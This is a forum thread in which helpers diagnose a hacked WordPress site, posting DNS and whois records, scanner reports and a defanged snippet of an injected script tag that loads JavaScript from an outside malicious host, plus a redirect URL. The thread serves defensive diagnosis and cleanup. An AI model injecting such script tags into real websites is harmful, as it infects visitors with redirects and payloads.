website hacked

I am the admin of http://hocmienphi.vn/
Currently , the website is broken and I can not work. You can support the solution help me . I don’t know much about security . Thanks!

Your website won’t resolve, take this up with the hoster,PAVIETNAM-AS-VN PAVIETNAM Co.,Ltd.
Re : http://www.dnsinspect.com/hocmienphi.vn/1437292837
http://toolbar.netcraft.com/site_report?url=http://dns19.fpt.vn (risk status 1 red out of 10).
Re: http://sameid.net/ip/27.0.14.46/ Unable to properly scan your site. Unable to connect.

% NOTE: The registry for this domain name does not publish ownership
% records (whois records) in the standard format. This data
% represents the most likely status of the domain based on
% information provided by the Internet’s domain name servers (DNS).

domain: hocmienphi.vn
status: taken
nameserver: dns19.fpt.vn
nameserver: dns20.fpt.vn

% For more information, please visit http://www.vnnic.net.vn

polonus

http://i.imgur.com/SiWfyWE.png

Hello

avast detects correct
the script malicious is blocked

https://www.virustotal.com/en/url/38f5ea325e3db2405f404568ad975eea5dd4d1910d72dca4e4ee0f3a4900e76c/analysis/1437352782/

< /div> < div class="vc_row-full-width"> < /div> < div class="vc_row wpb_row vc_row-fluid" > 
< div class="vc_col-sm-12 wpb_column vc_column_container "> 
< div class="wpb_wrapper"> 
< div class="wpb_text_column wpb_content_element "> 
< div class="wpb_wrapper"> 
< p> <  sc​ript  src=hxxp://online-sale24.com/1.js" type="text/javascript"> < / sc​ript > < /p> 
< /div> 

Results

http://zulu.zscaler.com/submission/show/7f9e990d56155bfc461e12f696f862c3-1437347558

https://urlquery.net/report.php?id=1437348301067

Html:Script-inf

https://www.virustotal.com/en/file/0057f7ac036b55ce61a786dde46c59cefdb491ab420ce36820778231bc2bac46/analysis/1437351244/

https://www.virustotal.com/en/file/4001645baf9fbce520ee3fac9d76f53e72717704151c1d1fa69bd9928311c016/analysis/1437351248/

any problems in platform wordpress
found this redirect,perhaps this is caused by the fact that it was hacked

hxxp://googleframe.net/tijaq.cgi?18

https://www.virustotal.com/en/url/479c7af17ba89a8f5abc0bd16a8d5f7c8990e9f1c5d43f5c8df24b047467c09b/analysis/1437343940/

https://sitecheck.sucuri.net/results/googleframe.net

additional Information

http://haseebayazi.com/2015/06/googleframe-net-a-new-wordpress-redirect-malware/

Confirmed, jefferson sant reports a real threat, and after this is cleansed it should be OK, but ask assitance from hoster.

pol